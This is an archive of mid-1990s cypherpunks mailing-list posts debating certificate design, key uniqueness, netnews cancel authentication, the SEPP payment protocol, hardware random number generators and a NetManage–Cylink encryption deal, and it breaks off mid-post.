In article <V0BgcD4w165w@bwalk.dm.com>, dlv@bwalk.dm.com (Dr. Dimitri
Vulis) writes:

> I'd like to remind everyone of the well-thought-out scheme for authenticating
> cancels proposed some time ago by Taneli Hujskonen and Benjamin Franz, that can
> also be integrated into a Lazarus-like system for tracing forged cancels.

Maybe.  On the other hand, there's nothing to keep certain well-connected
news administrators from removing the appropriate header line, or, even
more interestingly, substituting values such that the cancel equation
is well known.

Fundamentally, though, what I've discovered is that any significant change
to the news system is impossible to do, because installed base restricts
what people are willing to change.  Look at the dozens of extensions to
NNTP which all conflict, are non-standard or ill-described, yet are
demanded by moronic software such as Netscape's news reader.  When will
we see NNTP v3?  Never...

jms

Joel M Snyder, PhD, 1404 E Lind Rd, Tucson, AZ, 85719
Phone: +1 520 324 0494 (voice)  +1 520 324 0495 (FAX)  
jms@Opus1.COM    http://www.opus1.com/jms    Opus One

PLEASE NOTE: The useful parts of Arizona changed 
from area code 602 to area code 520 on March 20, 1995.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 5 Oct 95 19:54:05 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
Message-ID: <ac99e72b260210048f1f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:51 AM 10/6/95, Scott Brickner wrote:
>A public key *is* "very probably unique".  A "randomly selected" 1024 bit
>prime number has a specific amount of entropy in it.  The likelihood of
>two users world wide "randomly" choosing the same such prime may be
>precisely determined (assuming you can figure the entropy).
>
>Who needs a KCA to certify it?
>
>The real benefit of the KCA is as a means of linking the key with a unique
>person.  As I've commented before, anonyms have no meaningful "credit rating".

If I understand your usage of "anonym" correctly, I think you are clearly wrong.

An anonymous agent who has no persistence (no past history, no continuing
history, no expectation by others of future history) probably has no credit
rating, no "reputation."

However, an anonymous agent _with_ a persistent presence can have a credit
rating or reputation. Many examples of this, e.g., Pr0duct Cypher, Black
Unicorn, S. Boxx, and others.

The "linking with a unique person" is not especially important, IMO.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 5 Oct 95 17:18:56 PDT
To: weidai@eskimo.com (Wei Dai)
Subject: Re: subjective names and MITM
In-Reply-To: <Pine.SUN.3.91.951005111048.24409B-100000@eskimo.com>
Message-ID: <199510060021.UAA02958@homeport.org>
MIME-Version: 1.0
Content-Type: text


Wei Dai wrote:

| Perhaps it is better to think of names as subjective identifiers, and
| public keys as global ids.  That is, a person who has a collection of
| public keys gives each of them a name, but different people can name their
| keys differently.  Of course the holder of the corresponding private key
| can help in the naming process (e.g., "Please call me Wei").  If two
| people need to talk about a third party, they can refer to him by an
| arbitrary name after establishing a common binding between his key and
| that name. 

	Just a minor nit regarding a well thought out post, public
keys are not 'global' ids, but 'system-wide' IDs.  For keys to be
really global, there needs to be a mechanism in place for insuring
that key ids are very probably unique.  One way to ensure that keys
are globally unique would be to integrate a KCA identifier with the
keyid, and KCAs base part of their reputation on not signing multiple
keys with the same id.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 5 Oct 95 17:32:26 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Certificate proposal
In-Reply-To: <3074646C.2418@netscape.com>
Message-ID: <199510060035.UAA02995@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jeff Weinstein wrote:

|   I think the old idea of a certificate just binding a name and
| a key is turning out to not be very useful.  That is why Netscape
| Navigator 2.0 will support x509 version 3 certificates.  They allow
| arbitrary attributes to be signed into a certificate.  In this new
| world, you can think of a certificate as a way of binding a key with
| various arbitrary attributes, one of which may be(but is not
| required to be) a name.

	I'm a bit behind on the X.509 discussion, but does version 3
resist the attack Ross Anderson mentions in his 'Robustness Principles'
paper in Crypto '95?

	(The paper can be found in
ftp.cl.cam.ac.uk:/users/rja14/robustness.ps.Z  The wcf.ps.Z is his
'Why Cryptosystems Fail' paper, and both are well worth reading.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 5 Oct 95 17:45:57 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Rethinking the utility of netnews "cancel" control messages
Message-ID: <9510060045.AA17061@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Look just replace "cancel" with "mark as worthless and sign".  Then 

No.

Replace cancel with
	1.  Legal wants you to destroy this document
	2.  The site security officer wants you to destroy the document
	3.  The license has expired and you must destroy the document
and so on.  I don't think my life has been all that interesting, but
I've had all of those things happen.

Of course there is no guarnatee that indiviuals don't have private
copies, etc., but you have this situation currently and it works.
Replacing cancel with setaside makes Usenet architecture useful for
many business semantics/requirements.  That's not something I'm willing to
trade away and I am surprised that others would...

	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Thu, 5 Oct 95 20:59:01 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <199510060358.UAA03869@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DG06FE.IA8@sgi.sgi.com>, Hal <hfinney@shell.portal.com> writes:

> OK, so suppose I want to send my credit card number to Egghead Software.
> I get one of these new-fangled certificates from somebody, in which
> VeriSign has certified that key 0x12345678 has hash 0x54321.  I think we
> can agree that by itself this is not useful.  So, it will also bind in
> some attribute.  What will that attribute be?

Um, just a wild guess, but... your credit card number maybe?  (Well,
okay, its hash.)

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 5 Oct 95 18:08:42 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Rethinking the utility of netnews "cancel" control messages
Message-ID: <9510060107.AA17155@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Sigh.

>Replacing cancel with setaside makes Usenet architecture useful for
>many business semantics/requirements.  That's not something I'm willing to

Sigh.  useLESS for many ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 5 Oct 95 21:20:34 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <199510060419.VAA20574@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


tomw@orac.engr.sgi.com (Tom Weinstein) writes:

>In article <DG06FE.IA8@sgi.sgi.com>, Hal <hfinney@shell.portal.com> writes:

>> OK, so suppose I want to send my credit card number to Egghead Software.
>> I get one of these new-fangled certificates from somebody, in which
>> VeriSign has certified that key 0x12345678 has hash 0x54321.  I think we
>> can agree that by itself this is not useful.  So, it will also bind in
>> some attribute.  What will that attribute be?

>Um, just a wild guess, but... your credit card number maybe?  (Well,
>okay, its hash.)

I may not have been clear: the certificate I was referring to was the one
from Egghead, the one which I will use to make sure that I have a valid
key for Egghead.  Such a certificate would of course not have my credit
card number; it would probably have some information related to Egghead.
My rhetorical point was that information would most plausibly be a NAME
by which I would refer to Egghead.  I am still trying to understand how
these proposals to take names out of the picture will apply to a
commonplace situation like this one.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 5 Oct 95 21:18:29 PDT
To: Norman Hardy <norm@netcom.com>
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <ac9a42dc01021004b46d@DialupEudora>
Message-ID: <Pine.SOL.3.91.951005210923.11085D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Oct 1995, Norman Hardy wrote:

> Simon Spero writes:
> ....
> > What about a beam of high intensity ionising radiation aimed at the
> > detector?
> ....
> You presumably use the oddness of the count for your random bit in some
> predetermined time interval. External radiation can change, but not bias
> the parity. If the counter saturates, the counter may be biased towards one

Hmmm. But isn't this method slightly biased? If the probability of  N 
events < the probability of N+1 events, wouldn't you need a large number 
of events per bit to make the bias insignificant? 

The measurement I was thinking of (which would have been susceptible to 
the external attack) was to measure the interval between events, and 
convert that to a uniform distribution. That's probably trying to get too 
many random bits per event, but does let you use much lower level sources.

BTW, I was just having dinner with a bunch of guys from HP labs in 
Bristol, UK, and the subject of hardware RNGs came up. The idea of 
Strontium-90  as the next computer consumable has a certain appeal- the 
designating brandname is "Omnisource".

 "Are you having trouble scintillating? With Omnisource, you can scin till
  dawn!" 

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 5 Oct 95 18:31:50 PDT
To: cypherpunks@toad.com
Subject: (cpx) Mastercard, IBM, Netscape, CyberCash and GTE publish SEPP
Message-ID: <v02120d02ac9a33a0e5dd@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

To: e-payment@cc.bellcore.com, ietf-payments@cc.bellcore.com,
        www-buyinfo@allegra.att.com
Subject: Mastercard, IBM, Netscape, CyberCash and GTE publish SEPP
Mime-Version: 1.0
Date: Thu, 05 Oct 1995 16:12:23 -0400
From: Amir Herzberg <amir@watson.ibm.com>



MasterCard's Secure Electronic Payment Protocol is now available on the WWW at
http://www.mastercard.com/Sepp/sepptoc.htm (without the `l').

This protocol is based on iKP but includes much more details. You can download
it from the page above until we `re-hash' it into Internet Draft form.
Comments are very welcome, and I suggest we use the e-payment mailing list
for them (until an IETF working group is formed).

I believe that the publication of this spec and the STT spec suggests that
we should in fact proceed now with establishing a working group. So, I plan
to submit an updated charter soon... Comments on it are also welcome.

Best, Amir

Text version of the page:

Secure Electronic Payment Protocol Specification

The development of electronic commerce is at a critical juncture. Consumer
demand
for secure access to electronic shopping and other services is very high;
merchants
want simple, cost-effective methods for conducting electronic transactions;
financial
institutions want a level-playing field for software suppliers to ensure
quality
products at competitive prices. The next step to achieving secure,
cost-effective
on-line transactions at a rate fast enough to satisfy market demand, is the
development of a single, open industry specification.

The generally accepted process for developing a technical standard or
specification
within an industry is comprised of five steps:

   Collaboration of interested parties

   Preparation of the document

   Availability of the document for comment

   Modification of the document based on the comments

   Publication of the document for implementation.

In a effort to develop a specification for securing bankcard transactions over
the
Internet and other open networks, IBM, Netscape, GTE, CyberCash and MasterCard
have cooperatively developed the following draft document, which is now
available
for review and comment. Each company brought unique and valuable experience to
the effort.

The result of this collaboration is Secure Electronic Payment Protocol (SEPP)
an
open, vendor-neutral, non-proprietary, license-free specification for securing
on-line transactions. Currently in draft form, this document is available for
review
and comment by all interested parties. It also will be sent to Internet
standards-setting
bodies, including the Internet Engineering Task Force. Once comments are
received,
modifications will be made and a final document will be published in the public
domain.



Access to SEPP Specification

 This specification is structured in five files in order to make downloading
 easier:

 Preface: This file provides an overview of the entire SEPP document.

 Postscript (.Z), Postscript (.zip), Postscript (.hqx),
 Mac OS (Word 5.1[.hqx])

 If you'd like to browse just this part, Click Here.

 Part 1 - Business Requirements: This file defines the major business
 requirements for secure electronic payments.

 Postscript (.Z), Postscript (.zip), Postscript (.hqx),
 Mac OS (Word 5.1[.hqx])

 Part 2 - Functional Specification: This file contains the functional
 specification for the payment process and the certificate management system.

 Postscript (.Z), Postscript (.zip), Postscript (.hqx),
 Mac OS (Word 5.1[.hqx])

 Part 3 - Payment System Specification: This file defines the detailed design
 for the payment system.

 Postscript (.Z), Postscript (.zip), Postscript (.hqx),
 Mac OS (Word 5.1[.hqx])

 Part 4 - Certificate Management Specification: This file defines the detailed
 design for the Certificate Management System.

 Postscript (.Z), Postscript (.zip), Postscript (.hqx),
 Mac OS (Word 5.1[.hqx])

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 5 Oct 95 18:27:32 PDT
To: cypherpunks@toad.com
Subject: GC Tech GlobeID pilot
Message-ID: <v02120d08ac9a351a3ee0@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

X-Sender: pays@edelweb.fr
Mime-Version: 1.0
Date: Fri, 6 Oct 1995 00:46:46 +0100
To: Amir Herzberg <amir@watson.ibm.com>
From: pays@gctech.edelweb.fr (Paul-Andre Pays)
Subject: GC Tech GlobeID pilot
Cc: e-payment@cc.bellcore.com, ietf-payments@cc.bellcore.com,
        www-buyinfo@allegra.att.com



As it seems everyone is broadcasting URL about electronic payment
systems, let me propose
        http://globeid.gctech.fr/cgi-gid/welcome?Language=English
which does no lead to a specification but the Globe Online, Globe ID pilot
setup By GC Tech.

Sorry only a few pages are available in english by now.
  English and some other languages wil be available within a few weeks

Sorry again, but because real content is and will be available
we commited to deliver only a few hundreds Web Wallets for this
pilot. You can still use the web form to apply for one...

-- PAP

_________________________________________________________________________
PAP:  paul-andre.pays@gctech.edelWeb.fr
     tel:  +33 1 34 52 00 88                fax: +33 1 34 52 25 26
         GC Tech   "The Globe Online and Globe ID Technology Company"
  http://www.globeonline.fr/                 http://www.gctech.fr/

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 5 Oct 95 21:41:13 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
Message-ID: <199510060440.VAA23299@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Bob Smart <smart@mel.dit.csiro.au> writes:
>Consider the IPSEC case. The current situation is:

>1. We go through some process, let's call it Process A, where we determine
>   that we want to talk to IP address 192.9.8.7.

This would be, say, a DNS lookup on www.egghead.com.

>2. We go through another process where we obtain the public key of 192.9.8.7.

I get it by connecting to that IP address and asking for it, or perhaps
I have it cached or I get it from some public cache.

>3. We then try to decide, based on one or more certificates, whether we
>   trust the public key to be the correct public key for 192.9.8.7.

I see the certificate is signed by someone I trust and it certifies that
this key is good for connections to Egghead Software at www.egghead.com.

>Now consider the key-centric version.

>1. Process A returns a public key which denotes the destination we want to
>   talk to.

OK, maybe this is some DNS variant that given www.egghead.com, returns a
public key 0x12345678.

>2. We then go through a process to obtain the IP address that belongs to
>   that public key. We probably won't use the public key as an index to
>   get that information. We probably use the information that was input
>   to Process A. In fact this information may fall out as a byproduct
>   of Process A. [However if we needed to make a scalable distributed
>   database of RSA public keys then I have a design to do this -
>   available on application.]

OK, so now I do another DNS lookup on www.egghead.com to get the IP
address.  Or maybe I even use key 0x12345678 as an alternative index to
get that address.

>3. We don't need to trust any certificates or anything else at this stage.
>   The fact that the IP address belongs to the Public Key is signed by
>   the Public Key itself.

Now you've lost me.  Are you saying that the key is self-certifying,
saying "I belong to 192.9.8.7"?  That is, it is accompanied by a
signature issued by that key itself on this IP address?  I hate to be
difficult, but this does not provide me with a warm feeling.  Anyone
could have issued that key, claiming to belong to that IP address.  If
the person who did so is able to interpose himself between me and that
address then my messages are not secure.

>The same thing happens with e-mail. If "Process A" gives us an e-mail
>address to send to then we worry about whether we have the right public
>key to go with it. If Process A gives us a Public Key then we can
>have certainty about the associated e-mail address because the association
>is signed by the Public Key.

Again, I don't follow how we gain this certainty.

>And a big win that just falls out of this is that I can have a
>continuous exchange of information with one IP destination even if
>it keeps changing its actual IP address (mobile computing) or I
>can have an e-mail conversation with a person who keeps changing
>their e-mail address. The things you want just fall out instead of
>requiring clever software solutions.

This can be dealt with in the certificate context by having a
certificated key sign a statement that the IP address is now
such-and-such.

>In the key-centric world a certificate binds some attribute as a property
>of a publc key. So an X.509 certificate would say "The owner of this
>public key [i.e. person who knows the corresponding private key] owns
>the following point in the X.500 namespace", rather than that "the
>person identified by this DN owns the following publc key". Experience
>has shown that the latter interpretation is a mine-field. It really
>doesn't work.

I don't really care whether the name is called an attribute, a
distinguished name, or an ooblek.  I just don't see how you're going to
get along without it.  The fact is, we live in a world populated by
people and companies and we use names to identify them.  I will grant
that there are problems with uniqueness but I don't think the solution
can be to just give up on the whole idea of names since they are so
messy.  Pretending that keys are communicating beings is not going to
work.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Thu, 5 Oct 95 22:15:05 PDT
To: kinney@bogart.Colorado.EDU (W. Kinney)
Subject: Re: Quantum Crypto: Anecdote
In-Reply-To: <199510011929.NAA29289@bogart.Colorado.EDU>
Message-ID: <9510060507.AA20374@doom>
MIME-Version: 1.0
Content-Type: text/plain



> Given the regularity with which fears of factoring by quantum
> compters comes up around here, I thought I'd share a brief story: At
> a party last night, I ran into a couple of acquantances, and was
> delighted to learn that they are working on the current NIST quantum
> computing project, making quantum gates out of atomic traps similar
> to those used by Cornell and Weiman to get a Bose condensate with
> Rubidium (crypto relevance comes from odd places, eh?) Anyway, I
> talked them up a bit, and so far they've managed to construct a
> working "or" gate. The long-term project is to construct a quantum
> computer capable of factoring 15, which they expect to take at least
> several years.

Vazirani gave a talk at Parc a couple weeks ago, at which he described
a similar project under way at Los Alamos.  It's allegedly being
headed by Richard Hughes.

   - Mark -


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 5 Oct 95 19:21:02 PDT
To: sjb@universe.digex.net (Scott Brickner)
Subject: Re: subjective names and MITM
In-Reply-To: <199510060051.UAA04613@universe.digex.net>
Message-ID: <199510060224.WAA03180@homeport.org>
MIME-Version: 1.0
Content-Type: text


Scott Brickner wrote:

| Adam Shostack writes:
| >	Just a minor nit regarding a well thought out post, public
| >keys are not 'global' ids, but 'system-wide' IDs.  For keys to be
| >really global, there needs to be a mechanism in place for insuring
| >that key ids are very probably unique.  One way to ensure that keys
| >are globally unique would be to integrate a KCA identifier with the
| >keyid, and KCAs base part of their reputation on not signing multiple
| >keys with the same id.
| 
| A public key *is* "very probably unique".  A "randomly selected" 1024 bit
| prime number has a specific amount of entropy in it.  The likelihood of
| two users world wide "randomly" choosing the same such prime may be
| precisely determined (assuming you can figure the entropy).

	The key does indeed have a high likelihood of being unique,
but dealing with 1024 bit identifiers could strain database systems,
especially when 100 well chosen bits would be than enough.

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 5 Oct 95 23:59:32 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <3074D2F3.1E9@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:
> 
> Jeff Weinstein <jsw@netscape.com> writes:
> >  I think the old idea of a certificate just binding a name and
> >a key is turning out to not be very useful.  That is why Netscape
> >Navigator 2.0 will support x509 version 3 certificates.  They allow
> >arbitrary attributes to be signed into a certificate.  In this new
> >world, you can think of a certificate as a way of binding a key with
> >various arbitrary attributes, one of which may be(but is not
> >required to be) a name.
> 
> OK, so suppose I want to send my credit card number to Egghead Software.
> I get one of these new-fangled certificates from somebody, in which
> VeriSign has certified that key 0x12345678 has hash 0x54321.  I think we
> can agree that by itself this is not useful.  So, it will also bind in
> some attribute.  What will that attribute be?

  It would be some value that would allow the credit card
authorization agency to match it up with the submitted credit
card number.  In the case of MasterCard's SEPP they are using
a salted hash of the Account Number, where the salt value is
unique per account, is secret, and is shared between the
bank and the card holder.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 5 Oct 95 21:01:03 PDT
To: cypherpunks@toad.com
Subject: Re: NetManage & Cylink Crypto
Message-ID: <199510060358.XAA05252@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9510060012.AA02236@ch1d157nwk>,
andrew_loewenstern@il.us.swissbank.com (Andrew Loewenstern) wrote:

> Anonymous wrote:
> >  The link with Cylink will allow NetManage to license and include
> >  the Cylink public key encryption technology in its applications
> >  with a variety of ciphering systems to be used in the NetManage
> >  suite, including: DES, Triple DES, Safer, IDEA, Skipjack, RC-2,
>                                                    ^^^^^^^^
> >  and RC-4.
> 
> Hey, this is interesting...  will Skipjack be included in future NetManage  
> products or is this press-release only mentioning Skipjack as an example
of a  
> possible encryption algorithm for use with NetManage?

It probably requires a PCMCIA card.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHSpfCoZzwIn1bdtAQHhuAGAk64TLT89fxllmp1WhLxT/QJCrUuz3RmG
MPI9irXcFyldaHEIlnDGpk7OQug5uTY1
=dyzf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 5 Oct 95 15:59:52 PDT
To: cypherpunks@toad.com
Subject: NetManage & Cylink Crypto
Message-ID: <199510052259.XAA01586@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



NetManage & Cylink In Internet Encryption Deal


Guildford, Surrey, England, Oct 5 -- NetManage, a TCP/IP
specialist company, has signed a licensing deal with
Cylink Corporation. NetManage says the Cylink public key
cryptography technology will be incorporated in future
editions of NetManage's Internet applications software.

The move is significant since it marks the beginnings of
a competitor to the Netscape "secure" Web browsing
software, which has had two security flaws identified in
recent weeks.

Initially, NetManage's Chameleon Enterprise TCP/IP
applications suite will incorporate the Cylink public key
encryption technology, and later will include encryption
facilities in Internet Chameleon, a UKP139 PC-Windows
access suite designed for dial-up access to the Internet.

Both NetManage and Cylink plan to support an open
interface for Internet security which addresses the flaws
found in Netscape. The idea is to establish an open set
of standards to which Internet access packages of all
types will adhere to, and so ensure that companies
developing Internet software do not "re-invent the wheel"
when writing their software, and possibly open their
applications up to flaws.

According to NetManage, establishing a secure Internet
connection requires an Internet application to perform
two functions: authenticating the user, and encrypting
the data flow.

The link with Cylink will allow NetManage to license and
include the Cylink public key encryption technology in
its applications with a variety of ciphering systems to
be used in the NetManage suite, including: DES, Triple
DES, Safer, IDEA, Skipjack, RC-2, and RC-4.

NetManage claims the current implementations of security
proposed as standards by Netscape and RSA Data Security
are flawed, and fail to fully accommodate "open and
interoperable secure communications" between computers
which use different bulk encryption ciphers.

These problems, the company claims, have limited the
adoption of Internet security as a widespread
interoperable feature of all Internet software and
hardware products, including end-user applications,
servers, firewalls, and secure routers.

Later this month, NetManage and Cylink plan to announce
a next-generation "plug and play" Internet encryption
system. The implementation will be open and will not lock
software or hardware developers into the use of
encryption technology from any one vendor, as is the case
with Netscape, say the companies.

The related APIs, key exchange technology, and
encryption, will be made publicly available to other
software and hardware vendors. Licensing will include
source code and no per-copy royalty fees.

Further information can be downloaded from NetManage's
World Wide Web site at <http://www.netmanage.com>.

Contact: NetManage Europe, +44-1483-302333;
NetManage US, 408-973-7171.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 6 Oct 95 00:04:44 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <199510060358.UAA03869@orac.engr.sgi.com>
Message-ID: <3074D42E.58DE@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Tom Weinstein wrote:
> 
> In article <DG06FE.IA8@sgi.sgi.com>, Hal <hfinney@shell.portal.com> writes:
> 
> > OK, so suppose I want to send my credit card number to Egghead Software.
> > I get one of these new-fangled certificates from somebody, in which
> > VeriSign has certified that key 0x12345678 has hash 0x54321.  I think we
> > can agree that by itself this is not useful.  So, it will also bind in
> > some attribute.  What will that attribute be?
> 
> Um, just a wild guess, but... your credit card number maybe?  (Well,
> okay, its hash.)

  The hash of just the card number isn't good enough.  If you collected
a bunch of certificates (they are public) then you could start guessing
valid card numbers and trying to match the hashes with your database.
The Mastercard SEPP proposal uses a salted hash, where the salt is
a shared secret between the bank and the user.

	--Jeff

> --
> Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
> we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com

  There are too many Weinsteins hanging out here lately...  :-)

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 6 Oct 95 00:08:18 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <3074D507.1EE1@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:
> 
> tomw@orac.engr.sgi.com (Tom Weinstein) writes:
> 
> >In article <DG06FE.IA8@sgi.sgi.com>, Hal <hfinney@shell.portal.com> writes:
> 
> >> OK, so suppose I want to send my credit card number to Egghead Software.
> >> I get one of these new-fangled certificates from somebody, in which
> >> VeriSign has certified that key 0x12345678 has hash 0x54321.  I think we
> >> can agree that by itself this is not useful.  So, it will also bind in
> >> some attribute.  What will that attribute be?
> 
> >Um, just a wild guess, but... your credit card number maybe?  (Well,
> >okay, its hash.)
> 
> I may not have been clear: the certificate I was referring to was the one
> from Egghead, the one which I will use to make sure that I have a valid
> key for Egghead.  Such a certificate would of course not have my credit
> card number; it would probably have some information related to Egghead.
> My rhetorical point was that information would most plausibly be a NAME
> by which I would refer to Egghead.  I am still trying to understand how
> these proposals to take names out of the picture will apply to a
> commonplace situation like this one.

  I don't think that we need to get rid of names entirely.  It all
depends on the intended use.  In this case it would be reasonable
for the certificate to have the name in it.  It would also probably
be signed by a bank or card association CA, which was set up
specificly to sign merchant certificates.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 5 Oct 95 21:11:26 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates, Attributes, Web of Trust
Message-ID: <199510060409.AAA05305@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ac9961b42202100433c4@[205.199.118.202]>, tcmay@got.net
(Timothy C. May) wrote:
[...]
> But I go further: a huge number of interesting applications of strong
> crypto have no connections at all with physical persons, let alone with
> True Names. Agents in computer transactions, applets fired across networks,
> agoric entities in computational ecologies, BlackNet sorts of markets, and
> on and on.

This is true. Some of the most interesting applications of crypto don't
involve True Names at all. The only reason, IMHO, why crypto is often
thought of in terms of communicating between two True Names is because it
is an obvious application to the layman. But it are the Blacknet type of
uses where crypto really shines.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHSr6CoZzwIn1bdtAQECCAF+Jok52IdshM4nLGjwqiImzw93dy/zSy9E
QBmUR1yzX+17uuUoflSRE3R0bpx3uv+F
=UM4a
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 6 Oct 95 00:32:27 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates, Attributes, Web of Trust
In-Reply-To: <ac99d8e3240210043452@[205.199.118.202]>
Message-ID: <3074DAAB.3D62@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> At 7:11 PM 10/5/95, Jeff Weinstein wrote:
> 
> >  How about if the systems allows you to get a certificate that
> >has any name in it that you want, where the issuer makes no
> >claims about the identity of the owner of the certificate?
> >How about if the software lets the user decide which CAs they
> >will accept certificates from?  Given these two features,
> >would you still consider requiring a certificate to be bad?
> 
> Let's make sure what we mean by these two points:
> 
> 1. "...allows you to get a certificate that has any name in it that you
> want, where the issuer makes no claims about the identity of the owner of
> the certificate?"
> 
> I would expect that a certificate for "%63rrW209neU6q!" would be issuable
